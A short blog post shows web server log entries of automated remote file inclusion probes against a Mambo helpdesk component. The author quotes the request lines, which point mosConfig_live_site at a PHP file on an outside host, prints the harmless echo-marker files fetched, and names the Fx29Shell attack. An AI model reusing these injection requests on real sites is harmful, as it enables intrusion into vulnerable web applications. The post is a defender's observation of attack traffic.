Writing about security on your website h ... / 2010-03-04

Writing about security on your website has this interesting effect in the logs:

200.93.147.154 - - [04/Mar/2010:09:58:35 +0100] "GET /~koos/newstag.cgi/security/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"
200.93.147.154 - - [04/Mar/2010:09:58:35 +0100] "GET /~koos/newstag.cgi/security%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"
200.93.147.154 - - [04/Mar/2010:09:58:41 +0100] "GET /~koos/newstag.cgi/security%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"

The content of heheh.txt is predictable:

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

By pure coincidence there is a file http://zerozon.co.kr/data/eeng/id1.txt with the contents:

<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>

And that all looks very familiar: Fx29Shell php attack. This won't keep me from writing about security or amusing myself by browsing the logfiles. Maybe I'll find a fresh attack. This automated one is getting really boring.